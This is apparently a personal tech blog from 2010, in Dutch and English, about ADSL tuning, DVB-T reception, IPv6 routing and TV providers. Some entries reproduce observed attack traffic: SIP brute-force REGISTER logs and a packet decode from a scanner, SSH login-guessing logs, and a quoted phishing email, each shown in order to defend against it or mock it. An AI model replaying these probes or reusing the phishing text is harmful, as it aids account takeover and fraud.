... while talking to hcc3.schonemail.nl.:
>>> DATA
<<< 554 5.7.1 o54IQsMt007321: Found several indications this message is likely to be spam.
554 5.0.0 Service unavailable

Hetzelfde mailtje sturen zonder pgp-signature gaat ongestoord. Dan hebben ze het ook totaal niet begrepen daar. Gelukkig ben ik niet van ze afhankelijk voor e-mail, dan zou ik een 0900 nummer moeten bellen om uit te leggen dat ze het niet begrepen hebben en mijn uitgaande mail verstoren. Nu is het alleen een ergernis om sommige mensen te kunnen bereiken, die dit zelf ook een goeie aanleiding vinden om eens naar wat anders uit te kijken.

Naar aanleiding van een opmerking in FTD-vonnis is 'schokkend' en 'onhoudbaar' - Webwereld :

"Sinds 1983 is er niet zo'n verstrekkende uitspraak van een Nederlandse rechter op auteursrechtelijk gebied geweest", reageert Christiaan Alberdingk Thijm, advocaat bij SOLV, doelend op het Kabelpiraten-arrest uit 1983

heb ik even zitten lezen in het kabelpiraten-arrest en wat dingen er om heen gezocht. Het Kabelpiraten-arrest kwam er op neer dat de rechter KTA (kabeltelevisie Amsterdam) gebiedde om maatregelen te nemen zodat op het Amsterdamse kabelnet geen films meer doorgegeven werden die de tv-piraten er op zetten omdat anders KTA verantwoordelijk was voor de gederfde auteursrechten inkomsten.

Een beetje bladeren op het www en in youtube levert mooie verhalen op over TV-piraten die begin jaren 80 zich prima vermaakten met kabelnetwerken of als zelfstandige lokale TV-zender. De toen nog jonge kabel TV netwerken hadden gevoelige antennes om buitenlandse (duitse en belgische) TV zenders te ontvangen maar als die zenders uitgingen na zendersluiting konden TV-piraten redelijk simpel op die antennes instralen met de PAL-RF modulator van een videorecorder (toen net redelijk verkrijgbaar) en een lineaire versterker. Of in gebieden zonder kabel draaiden complete regionale TV zenders. Wat allemaal niet mocht: we hadden Nederland 1 en Nederland 2 en lokale tv en/of commerciële TV was niet de bedoeling van het Nederlandse omroepbestel.

Ik heb dat natuurlijk allemaal gemist, ik was toen nog zo jong dat ik gewoon op tijd naar bed moest en niet op het idee kwam om na zendersluiting nog alle voorkeuzes af te zoeken naar rare programma's (en het heeft voorzover ik kon vinden ook niet zo gespeeld in Nieuwegein / Utrecht). Overdag zocht ik wel eens of er nou echt niet meer op de kabel stond dan wat we wisten, wat voorzover ik me kan herinneren een keer heeft opgeleverd dat ik net iets vroeger doorhad dat er een zender bijkwam.

• Geschiedenis van de Eerste Egmondse Vrije Televisie in nieuwsberichten
• Item TV-piraterij uit het Nederlandse nieuwsoverzicht 1981 (Youtube)

Marco Hogewoning presented the IPv6 CPE survey at the recent RIPE Meeting in Prague. RIPE Labs now has the results on-line: IPv6 CPE Survey, what equipment is available at the moment to get IPv6 at home and what is it compatible with. There is a scary story in the lack of width of the resulting matrix: only a few vendors support IPv6 and not the ones (Alcatel / Speedtouch / Thomson / Technicolor or whatever they are called today) which produce the really big numbers.

Vanavond was het wel lastig dat we het zonder CNN moeten stellen op de analoge kabel in Utrecht omdat ik toen ik thuis kwam wel wilde weten wat de laatste ontwikkelingen waren rond de situatie rond de situatie in het midden-oosten. Je zou bijna met een palestijnse vlag gaan zwaaien in plaats van met een oranje.

Messages from the Barracuda E-mail filter are quite useless. When you request information about a specific IP being blocked you get the very, very generic story:

We are sorry you have reached this page because an email was blocked based on its originating IP address having a "poor" reputation. The "poor" reputation may have been caused by one of the following reasons:

• Your email server contains a virus and has been sending out spam.
• Your email server may be misconfigured.
• Your PC may be infected with a virus or botnet software program.
• Someone in your organization may have a PC infected with a virus or botnet program.
• You may be utilizing a dynamic IP address which was previously utilized by a known spammer.
• Your marketing department may be sending out bulk emails that do not comply with the CAN-SPAM Act.
• You may have an insecure wireless network which is allowing unknown users to use your network to send spam.
• In some rare cases, your recipient's Barracuda Spam Firewall may be misconfigured.

Which is completely useless when you need information what is causing this listing and whether the spam flow is already stopped. I'm not gambling on trying the 'request removal' link until I know what is causing this.

Barracuda mail filtering: NOT helping solve the spam problem. With some Evil Greedy Corporation conspiracy thinking: really helping stop spam would be bad for business in the long run for Barracuda.

De niet maximale snelheid van de ADSL ligt duidelijk niet aan de binnen bekabeling. Ondertussen staat het ADSL modem beneden in de meterkast en is er uit het afbreken van die telefoonlijn naar zolder een interresante verbinding gekomen. Ook een testje zonder ADSL splitter leverde geen echte verandering op. Grappig is dat na het terugzetten van de splitter de snelheid iets omhoog is gegaan (van 13 megabit naar 15 megabit). Gaat vast wel weer een keer omlaag. Ooit had ik een 2draads huurlijn op maar liefst 33.6 kilobit die bij zware regenbuien naar 28.8 kilobit of zelfs minder wegzakte, daar moet ik nu aan terugdenken.

=>:adsl info                     
Modemstate            :  up 
Operation Mode        :  G.992.5 Annex B
Channel Mode          :  interleaved 
Number of resets      :  19 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             TMMB             BDCM 
  VendorSpecific      :             0000             ff91 
  StandardRevisionNr  :               00               02 

                                  Downstream        Upstream 
Margin       [dB]     :              6.5             16.0 
Attenuation  [dB]     :             21.5             12.5 
OutputPower  [dBm]    :             20.5             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            35702            15138 
  Upstream            :             2426             1029 

The good thing about trying to receive distant transmitters via dvb-t is: when it works, all the results are on the computer. So there is now a script which converts the scan results from all the DVB-T dx experiments into a nice webpage: DVB-T reception log.

The Tropospheric ducting forecast for Northwest Europe showed not much happening yesterday evening but I tried a dvb-t scan anyway. No foreign services, but the highest score in services from the Netherlands: 16 active frequencies with 180 services in total. The new find: Digitenne Mux 3 on 554 MHz.

I guess some kind of bug in the sipscanner at 193.55.30.2 got triggered by my firewalling the IP so asterisk does not 'see' the traffic. The incoming traffic is now up to 70 kilobyte/second. It is all ignored, but that is still a fair chunk of incoming bandwidth being eaten.
Update 2010-05-24 I let asterisk answer the requests for a few packets which slowed down the incoming traffic again to something reasonable. And this morning the traffic was gone which suggests somebody read my report to the security contact.

I saw interesting conditions coming up on the Tropospheric ducting forecast for Northwest Europe so I ran a dvb-t scan and indeed found:

tune to: QAM_16   f = 674000 kHz I999B8C23D0T8G4Y0 
SDT (actual TS)
        service = MDR S-Anhalt (ARD)
        service = NDR FS NDS * (ARD)
        service = SWR Fernsehen RP (ARD)
        service = WDR Düsseldorf (ARD)
        service = WDR Wuppertal * (ARD)
        service = WDR Duisburg (ARD)

tune to: QAM_AUTO f = 690000 kHz I999B8C999D999T999G999Y999 
SDT (actual TS)
        service = arte (ARD)
        service = Phoenix (ARD)
        service = Einsfestival (ARD)
        service = Das Erste (ARD)

tune to: QAM_AUTO f = 746000 kHz I999B8C999D999T999G999Y999 
SDT (actual TS)
        service = ProSieben (ProSiebenSat.1)
        service = SAT.1 (ProSiebenSat.1)
        service = kabel eins (ProSiebenSat.1)
        service = N24 (ProSiebenSat.1)

No extra services from the east of the Netherlands, so this must have been some interesting tropospheric ducting. First time for ARD and Prosieben/Sat.1, I have seen the WDR multiplex on that frequency before from Brunssum, a sign this must be a single frequency network. Searching DVB-T Sender Tabelle shows the transmitter at Wesel is the most likely source, a distance of 112 kilometer.

Just got in and noticed that the adsl link was particularly s-l-o-w. A tcpdump showed that there was a SIP brute-force attack going on, and with the wondershaper settings this was filling the ADSL upstream to the maximum. In the asterisk logs:

[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"607589258"<sip:607589258@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"2737039014"<sip:2737039014@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"hello"<sip:hello@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"ranger"<sip:ranger@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"shadow"<sip:shadow@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"baseball"<sip:baseball@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"donald"<sip:donald@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"harley"<sip:harley@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"hockey"<sip:hockey@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"letmein"<sip:letmein@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found

[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@xx.xx.xx.xx>' failed for '193.55.30.2' - No matching peer found

For a total of 284970 attempts. Then I updated the firewall to block this. And send out an abuse report to the ISP.

With tshark the attacks look like:

Session Initiation Protocol
    Request-Line: REGISTER sip:xx.xx.xx.xx SIP/2.0
        Method: REGISTER
        [Resent Packet: False]
    Message Header
        Via: SIP/2.0/UDP 127.0.0.1:5091;branch=z9hG4bK-1064873464;rport
            Transport: UDP
            Sent-by Address: 127.0.0.1
            Sent-by port: 5091
            Branch: z9hG4bK-1064873464
            RPort: rport
        Content-Length: 0
        From: "instruct" <sip:instruct@xx.xx.xx.xx>
            SIP Display info: "instruct" 
            SIP from address: sip:instruct@xx.xx.xx.xx
        Accept: application/sdp
        User-Agent: friendly-scanner
        To: "instruct" <sip:instruct@xx.xx.xx.xx>
            SIP Display info: "instruct" 
            SIP to address: sip:instruct@xx.xx.xx.xx
        Contact: sip:123@1.1.1.1
            Contact Binding: sip:123@1.1.1.1
                URI: sip:123@1.1.1.1\r
                    SIP contact address: sip:123@1.1.1.1\r
        CSeq: 1 REGISTER
            Sequence Number: 1
            Method: REGISTER
        Call-ID: 3859238695
        Max-Forwards: 70

Glenn Fleishman (wireless network expert) has taken the time to completely read and analyze the class-action suit against google for collecting public data from wi-fi networks and tears it to pieces:

You're broadcasting data in an unlicensed band. You have no reasonable expectation of privacy over openly broadcast data.

In my opinion google should not have collected this data. It still sounds like installing kismet and forgetting to configure it completely. Google should wipe this data immediately. Not hand it over to any law enforcement because law enforcement should not have this data either, it should be wiped thoroughly. But starting a stupid lawsuit with falsehoods and lies like:

9. In 2006, Google generated programming code that sampled and decoded all categories of publicly broadcast WiFi data. This type or class of program is commonly called a packet analyzer, also known as a network analyzer, protocol analyzer or packet sniffer, or for particular types of networks, an Ethernet sniffer or wireless sniffer ("wireless sniffer"). As data streams flow across the wireless network, the sniffer secretly captures each packet (or discreet package) of information, then decrypts / decodes and analyzes its content according to the appropriate specifications.

10. To view data secretly captured by a wireless sniffer in readable or viewable form, after being captured and stored on digital media, it must then be decoded using crypto-analysis or similar programming or technology. Because the data "as captured" by the wireless sniffer is typically not readable by the public absent sophisticated decoding or processing, it is reasonably considered and understood to be private, protected information by users and operators of home- based WiFi systems.

I get worked up just having to point out the lies and false acquisations in this part. I really hope this suit by Vicki van Valin and Neil Mertz backfires on them.

Running kismet from a wardriver-CD will yield you the same data unless kismet was configured (not the default!) to not save that data. So the above statements are false.

Webmail account phishers sometimes write interesting works of fiction:

We are currently performing maintenance on our Digital webmail Server because it has come to our notice that one or more of our internet subscribers are introducing a very severe virus into our system, thereby hacking into our esteemed customers private data, and this is affecting our network performance by all standards, as well as causing our customers like you so much complications.

.. and after this bit of bad news about the provider their systems seem to be so damaged by the virus they need to ask for the domain name:

In order to ensure you do not experience service interruption, kindly you reply to this email immediately and enter your Domain Name: for example, mail.icb.com.

.. please don't respond to these. Please.

No this is not the result of an artillery attack on a swimming pool, this was the weather in Oklahoma city on 16 May 2010. Source: Monster hail storm slams Oklahoma city - TornadoVideos.Net

End of an era: Duke university is to shut down their Usenet server, the place where it all started.

This week marks the end of an era for one of the earliest pieces of Internet history, which got its start at Duke more than 30 years ago.

On May 20, Duke will shut down its Usenet server, which provides access to a worldwide electronic discussion network of newsgroups started in 1979 by two Duke graduate students, Tom Truscott and Jim Ellis.

Working with a graduate student at UNC-Chapel Hill, they came up with a simple program to exchange messages and files between computers at Duke and UNC using telephone modems.

Maybe newer services like twitter and facebook have taken over, but there is still nothing compared to the distributed nature of Usenet. Those services all have centralized storage of their data which means there is one place to delete it. With Usenet, you can't unpublish anything. This is both a blessing and a curse.

Source: Duke To Shut Down Usenet Server - Slashdot

Ik heb van het weekend eens voor de aardigheid een proefexamen radio amateur novice gedaan. Zonder enige studie vooraf een score van 27 van de 40, om het te halen is een score van 29 nodig. Blijkbaar is er genoeg van mijn MTS electronica blijven hangen. Op specifieke radio techniek en de regels moet ik nog wel het nodige studeren als ik een licentie zou willen halen.

After a discussion in which I got to quote the Reply-To munging considered harmful I upgraded Ubuntu on my laptop and noticed Thunderbird 3.0.4 recognizes mailing list headers and gives 'Reply', 'Reply all' and 'Reply list' headers depending on what would be correct. Finally!

Amusing log entries:

May 11 09:17:01 greenblatt sshd[17063]: Invalid user !@#$%^ from 82.228.181.124
May 11 09:17:03 greenblatt sshd[17076]: Invalid user !@#$%^& from 82.228.181.124
May 11 09:17:04 greenblatt sshd[17088]: Invalid user !@#$%^&* from 82.228.181.124
May 11 09:17:05 greenblatt sshd[17090]: Invalid user !@#$% from 82.228.181.124
May 11 09:17:07 greenblatt sshd[17092]: Invalid user @#$%^& from 82.228.181.124

Quit @#$%^& breaking into my system.

Onderweg op de ligfiets geluisterd naar de podcast met de registratie van de nederlandse d-star ronde van de dinsdagavond ervoor. Van die dingen waar je alleen onderweg aan toekomt. Ik was nogal huiverig om op de ligfiets oordopjes in te doen omdat ik het idee heb dat ik meer op gehoor rij dan op een rechtopfiets. Maar op een uiterst bekende route die ik ook bijna slapend kan rijden en waar ik ook weet waar de lastige plekken zitten is het risico minder groot. Ik heb geen gevoel onderweg gehad dat ik ineens in een gevaarlijke situatie zat. Zo naar amateur radio luisteren doet me wel afvragen of er misschien ook amateur radio rondes zijn in de ochtendspits en avondspits. Ik heb gehoord van Mike Andrews W5EGO dat er in Kansas zo een ronde is op werkdagen. Dat is natuurlijk wel de ultieme versie van 'drivetime radio'.

Ok, this one was new to me:

-bash: ./storscript: /bin/bash: bad interpreter: Text file busy

How? the script was copied using scp and there was a hanging sshd (something about a not 100% reliable network).

Nu blijkt Glashart media (die onder andere de TV verzorgt voor XMSnet) officieel ook geen BBC door te mogen geven: Glasvezelabonnees kijken illegaal BBC - Webwereld. Alleen laat Glashart de wensen van hun klanten even voorgaan. Een nieuw concept: een televisie-doorgever die beter naar z'n klanten dan naar z'n contentleveranciers luistert. Ik ben benieuwd wat hier uit komt.
Update: Per 12 juni 2010 is Glashart toch gestopt met BBC 1 en 2. Weinig informatie te vinden over hoe en waarom behalve bij wat providers die het Glashart media pakket doorgeven.

I like htop as a nicer looking replacement for top. And on one machine I recently noticed this little gem: the uptime has an exclamation mark when it runs over 100 days. And a bit of searching confirms: htop has a real easter egg, confirmed by the author.

Ik dacht: ik vraag vandaag eens die 'upgrade' aan bij xs4all, van lite-oud 8 megabit naar lite-nieuw 16 megabit, dan doen ze die maandag of dinsdag en dan weet ik waar ik aan toe ben met de bekabeling omdat ik daar toch al wat meer problemen verwacht.

Binnen 5 minuten na 'bevestigen' deed de telefoonlijn hik en stond er ineens 14583 kilobit downstream. Zo automatisch gaat dat blijkbaar, daar is vast geen monteur aan te pas gekomen. Maar er is dus duidelijk ruimte voor verbetering aan de bekabeling: de verbinding is nu niet heel stabiel, de snelheid is al even omhooggegaan naar 14769 en toen weer gezakt naar 12743 kilobit. Tijd om te kijken hoe een en ander beter kan. Maar aangezien de telefoon ook wat raars doet kijk ik even verder naar mogelijkheden.

De adsl verbinding had weer een slechte dag vandaag, de downstream snelheid was gezakt van 8006 naar 7344 kilobit. Maar eens de telefoonlijn die voor adsl gebruikt wordt nagekeken en het bleek dat deze lijn een rare aftakking had. Dat helpt natuurlijk niet. Die aftakking er af gehaald en toen schoot de noise margin weer omhoog. En na een hint naar het modem om even de snelheid opnieuw te bepalen was het weer 8006 kilobit.
De optie om de hele lange telefoonkabel op te heffen en het adsl modem beneden te zetten blijft natuurlijk. Maar dan moet er weer iets met utp kabel door het huis.

Via de xs4all native IPv6 test komt ook voorbij dat er nu diensten getest worden met IPv6. radio-streams.net geeft voor gebruikers en makers van radio-streams aan wat IPv6 betekent voor ze en heeft een aantal teststreams on-line. Italo en 80s muziek via IPv6!

Wardriving results 1 April - 23 April: 6756 new networks with GPS networks according to WiGLE. My position in the WiGLE stats is bouncing a bit up and down as others are around the same numbers for found networks.

I have been following the developments in amateur radio a bit. A new digital system called d-star is making progress. I found out there is a nearby d-star repeater on the Gerbrandytoren: PI1UTR and noticed they have a radio roundtable every Tuesday evening. I don't have the digital voice equipment to listen to that via the air but these days it is easy: the roundtable uses D-star reflector 017 and there is this 'Listen to REF017A' button which links to a livestream. I copied the livestream URL to the 'Internet radio' setup of the Netgear mediaplayer and listened to the roundtable via the home sound system. Way too easy method to listen to radio amateurs! But it is a nice way to get a feeling for procedures, what is being discussed and such. Even with digital voice and a reasonable quality livestream it still takes experience in radio listening to understand everything.

I found an active nederlandse d-star website but I still can't find a good basic d-star for non-radio-amateurs explained manual. A lot of the information is either really basic or aimed at informing existing users of new developments. The english wikipedia article on D-Star has a lot on the development and technical side of D-Star but not on its use.
Update 2010-04-29: I found a lot more interesting and accessible information at the D-Star UK website.

Toevallig is Henk van de Kamer ook net aan het rekenen aan het televisie aanbod omdat Aalten ook in de planning zit voor glasvezel en een van de aanbieders met een best leuk aanbod komt. Het leuke punt is natuurlijk symmetrisch Internet maar het totale aanbod maakt het ook interresant.

Zeven dagen lang week VVD-Kamerlid Fred Teeven geen moment van haar zijde en keek hij haar aan. Bij het opstaan, bij het naar school gaan, bij het avondeten, overal werd de 15-jarige havo-scholiere Chantal Linsen gevolgd door het politieke zwaargewicht. En ’s nachts sliep hij op een matje naast haar bed. Teeven wilde hiermee bewijzen dat iemand die niets te verbergen heeft, ook niet bang hoeft te zijn voor een gebrek aan privacy.

VVD-er Fred Teeven volgt een week lang 15-jarige scholiere

Grappig is wel dat de website van de Utrechtse programmaraad zichzelf profileert met schotels aan balkons. Als er ergens is waar ze geen invloed hebben omdat mensen zelf wel uitzoeken welke van de duizenden kanalen ze willen kijken is het wel op de schotel.

Volgens een brief van Ziggo gaat CNN uit het analoge pakket in Utrecht omdat ze van de programmaraad TV5 er op moeten zetten en volgens de Utrechtse programmaraad is dat omdat Ziggo het analoge pakket aan het verkleinen is.

En dat nu pas na allerlei juridische procedures het originele advies uit 2008 wordt uitgevoerd. Ziggo wil eigenlijk alles richting digitaal, en zo meer controle over wat de kijkers doen met het tv-signaal en meer verdienste aan extra pakketten. En Ziggo lijkt niet zo blij te zijn met de invloed van de programmaraden.

Aan de andere kant lijkt de programmaraad ook vooral te kiezen voor 'wat mensen zouden moeten willen kijken' (cultuur) en zenders voor vreemde talen gekoppeld aan actieve minderheden (TVE, Spaans) of waar een flinke partij subsidie achter zit (TV5 Monde, Frans). Dat kunnen ze wel willen maar uiteindelijk kijkt 'men' toch naar RTL-4.

We gaan ons zolangzamerhand afvragen waar we heen willen met TV, alles heeft zo z'n nadelen:

• Ziggo analoog krimpt in
• Ziggo digitaal blokkeert actief dat je digitaal opneemt met de PC
• Digitenne heeft geen BBC
• XMSnet komt met dvb-c zonder crypto maar levert nog niet in onze straat (en heeft bij hun Internet-dienst nog nooit gehoord van IPv6)
• Xs4all ging iets met tv doen maar houdt zich ook stil
• Satelliet vraagt een investering in apparatuur, bekabeling en een tocht naar het dak.

En van alles vraagt een investering in apparatuur. Waarbij je dan per apparaat weer moet controleren of het met de dienst samenwerkt en in hoeverre het nog naar de gebruiker wil luisteren. Als een aanbieder besluit dat BBC 2 logisch kanaalnummer 52 heeft wil ik het weer op 14 kunnen zetten, wat ook niet altijd mogelijk is: de Humax iPVR9200C lijkt dit bijvoorbeeld niet te kunnen, de Samsung P850r wel. De voorkeuzenummers zijn er voor mijn gemak, niet voor de marketing-campagnes van aanbieders.

Rustig afwachten is blijkbaar de beste optie. Het kan ook zijn dat dit veranderend medialandschap een teken is dat het hele idee van TV op z'n retour is. Clay Bennett Cartoon: high-definition television
Update 2010-05-04: Officieel blijkt XMSnet ook niet BBC door te mogen geven. Nog een argument om vooral rustig te wachten hoe dat afloopt.

IP version 6 has grown up: I just noticed the first ipv6 firewall log entries which I did not cause with my own testing:

SRC=2002:915e:bf90:000d:f9c9:eab8:7632:0f6d DST=2001:0888:1011:0000:0000:0000:0000:0694 LEN=72 TC=0 HOPLIMIT=120 FLOWLBL=0 PROTO=TCP SPT=49494 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0

A 6to4 IPv6 address trying something stupid with windows filesharing. IPv6 has grown up!

A kernel panic because of some tweaking in the ISDN driver made it time for event-driven maintainance on the home server greenblatt. So I shut down the server, did the last syncs and removed the remaining two parallel ata disks and the promise IDE controller which was no longer needed. I re-enabled the "Cool'n'quiet" bios option so linux power saving works again, which should result in a drop in power use.
Update: As the graph shows removing the disks and re-enabling powersave has helped reducing power use.

Lots of SIP attacks lately (stuff which goes on even when I'm more interested in IPv6). First near-standard SIP registration attacks from Amazon EC2, also seen by one of my asterisk installs:

[Apr 10 16:40:30] NOTICE[6890] chan_sip.c: Registration from '"02"<sip:02@xxx.xxx.xxx.xxx>' failed for '184.73.12.46' - No matching peer found
[Apr 10 16:40:30] NOTICE[6890] chan_sip.c: Registration from '"03"<sip:03@xxx.xxx.xxx.xxx>' failed for '184.73.12.46' - No matching peer found

My system wasn't the only one attacked, I saw reports everywhere, including: Amazon EC2 SIP Brute Force Attacks on Rise - VoIP Tech Chat , Amazon EC2 Flood Attacks from the Cloud - VoIP Users Conference, SIP Attacks From Amazon EC2 Going Unaddressed - SlashDot IT and SIP Brute Force Attack Originating From Amazon EC2 Hosts - Stuart Sheldon.
I changed /etc/asterisk/sip.conf to include alwaysauthreject = yes which makes SIP account enumeration impossible: the attacker can't see the difference between 'account does not exist' or 'password not valid'. This violates the SIP rfc but makes attacks a lot harder.
A lot of the articles above give one answer: Amazon EC2 network abuse does not care. Which immediately degrades the 'standing' of their network. You don't care about attacks originating from your network means lots of people won't care about anything originating from your network.

Het 'Uw adres' kader op de website van de hcc pc!gg netwerkgroep is nu aangepast om bij IPv6 adressen die afgeleid zijn van het netwerkkaart adres (EUI-64 adressen) ook weer te geven van welke leverancier die netwerkkaart is. Dit naar aanleiding van een discussie over IPv6 adressen en privacy extensies.

Ik had nog een raar probleem met IPv6 neighbour discovery op alleen eth0.1. Ook als ik de native ipv6 uitschakelde bleef dit probleem, en alleen op eth0.1. Dat kwam me vaag bekend voor: in 2007 zag ik dit ook al. Ik had even als test een extra adres aan de tunnel toegevoegd en weer weggehaald, maar daardoor stond er weer een dubbele route naar 2001:888:1011::/64. De goeie aanpak is om adressen die ook in andere netwerken voorkomen toe te voegen met een /128 netmask:

    up ip -6 addr add 2001:888:1011::13/128 dev xs4allipv6

Maar niet een IP uit de ene range gebruiken op een andere interface is minder verwarrend. Adressen genoeg ;)

Werkend IPv6 via zowel de tunnel als via de native aansluiting. Ik hou nog even de tunnel aan omdat die een voorspelbare v6 range heeft en ik daarin services heb die extern bereikbaar moeten zijn zoals deze website:

$ dig +short idefix.net aaaa
2001:888:1011::694

En nog veel lastiger om te wijzigen:

   Server Name: NS2.IDEFIX.NET
   IP Address: 2001:888:1011:0:0:0:0:694
   IP Address: 82.95.196.202
   Registrar: EPAG DOMAINSERVICES GMBH

Ik heb er dus voor gekozen wireless clients adressen uit de native range te geven en te routeren via die link, en de server en de wired aansluitingen nog via de v6 tunnel. Daar is rulebased routing voor nodig, en omdat ik verbindingen vanaf de server nog via de tunnel wil is 'native' de uitzondering voor mij. Eerst probeerde ik 'niet tunneladres' als regel:

ip -6 rule add type unicast not from 2001:888:1011::/48 priority 32765 table 17

En dan de routing in /etc/ppp/ipv6-up.d/default :

ip -6 route add default dev ${PPP_IFACE} table 17

Maar dat werkte niet: verkeer vanaf de server naar de wireless clients werd ook de ppp0 link opgestuurd, dat werkte dus niet. Dat was weer te omzeilen door een regel voor het wireless netwerk in table 17 te dupliceren, maar dat is niet handig bij eventuele wijzigingen van de IPv6 range.
Beter: een filter maken wat 'native' verkeer herkent. Een beetje voorkennis helpt: in de xs4all native dsl proef krijgen klanten een /48 uit 2001:980::/32. Dus dan in /etc/ppp/ipv6-up.d/default :

ip -6 rule add type unicast from 2001:980::/32 priority 32765 table 17
ip -6 route add default dev ${PPP_IFACE} table 17 || true

De gewone ipv6 default route komt uit /etc/network/interfaces :

auto xs4allipv6
iface xs4allipv6 inet6 v4tunnel
    endpoint 194.109.5.241
    address 2001:888:10:11::2
    netmask 64
    up ip tunnel change xs4allipv6 ttl 64
    up ip -6 addr add 2001:888:1011::13/128 dev xs4allipv6
    up ip -6 route add unreachable 2001:888:1011::/48
    # rest /48 nullrouten, specifiekere routes hebben voorrang
    up ip -6 route add default via 2001:888:10:11::1 src 2001:888:1011::13
    up ip -6 addr change 2001:888:10:11::2/64 dev xs4allipv6 preferred_lft 0
	# tunneladres nooit als uitgaand adres gebruiken
    #
    down ip -6 route del unreachable 2001:888:1011::/48
    # maar dan moet ik ook die nullroute weer weghalen :)

En nu werkt het voor beide IPv6 ranges. Native:

$ traceroute6 abaris
traceroute to abaris.idefix.net (2001:470:1f15:db:131:211:84:204) from 2001:980:111b:2:21f:e1ff:fe45:2894, port 33434, from port 63747, 30 hops max, 60 byte packets
 1  2001:980:111b:2:21f:c6ff:fe59:76f6 (2001:980:111b:2:21f:c6ff:fe59:76f6)  1.517 ms  1.773 ms  5.713 ms 
 2  lo1.dr4.1d12.xs4all.net (2001:888:0:4401::1)  37.795 ms  39.791 ms  20.754 ms 
 3  2001:888:0:4403::2 (2001:888:0:4403::2)  30.975 ms  17.414 ms  20.025 ms 
 4  0.ge-1-2-0.xr1.sara.xs4all.net (2001:888:2:2::1)  19.104 ms  21.797 ms  26.274 ms 
 5  10gigabitethernet3-3.core1.ams1.he.net (2001:470:0:e8::1)  24.385 ms  17.858 ms  17.255 ms 
 6  gige-gbge0.tserv11.ams1.ipv6.he.net (2001:470:0:7d::2)  24.295 ms  24.621 ms  23.004 ms 
 7  abaris.idefix.net (2001:470:1f15:db:131:211:84:204)  30.448 ms  27.849 ms  21.872 ms 

En tunnel:

$ traceroute6 abaris
traceroute to abaris.idefix.net (2001:470:1f15:db:131:211:84:204) from 2001:888:1011::13, port 33434, from port 53569, 30 hops max, 60 byte packets
 1  xs4all17.ipv6.xs4all.nl (2001:888:10:11::1)  17.177 ms  16.589 ms  17.447 ms 
 2  104.ae0.xr4.1d12.xs4all.net (2001:888:0:3::1)  25.176 ms  22.599 ms  15.982 ms 
 3  0.ge-0-2-0.xr1.sara.xs4all.net (2001:888:2:1::1)  22.124 ms  19.112 ms  19.868 ms 
 4  10gigabitethernet3-3.core1.ams1.he.net (2001:470:0:e8::1)  19.501 ms  16.943 ms  15.742 ms 
 5  gige-gbge0.tserv11.ams1.ipv6.he.net (2001:470:0:7d::2)  24.070 ms  20.348 ms  19.108 ms 
 6  abaris.idefix.net (2001:470:1f15:db:131:211:84:204)  25.500 ms  24.720 ms  21.881 ms 

De juiste data in radvd.conf komt uit een slim scriptje wat net nadat wide-dhcp6c de interfaces geconfigureerd heeft toeslaat. Op het moment dat het script /etc/wide-dhcpv6/dhcp6c-script uitgevoerd wordt is iets te vroeg, dus ik heb daar in staan:

RADVDCONF=/etc/radvd.conf

genradvdconf ()
{
    echo > $RADVDCONF
    for IFACE in "$@"
    do  
        /etc/wide-dhcpv6/iface2radvd.sh $IFACE >> $RADVDCONF
    done
}

( sleep 5 ; genradvdconf eth0.1 eth0.3 ; /etc/init.d/radvd reload ) &

En even doordenkend: als ik ooit iets probeer te benaderen bij een andere xs4all-v6-native klant heb ik inderdaad een probleem (met het ontvangen van de antwoorden). Deze oplossing is dus niet blijvend. Maar als IPv6 over dsl gewoon wordt dan hoef ik niet meer met die tunnel bezig te zijn.

I tried whether the Jabra BT125 bluetooth headset was going to work with both phones. Yes, you can pair this headset with multiple phones. You just need to select 'connect to device' on the phone to convince the headset to switch over.

De speedtouch 510 geeft een duidelijk slechtere lijnkwaliteit:

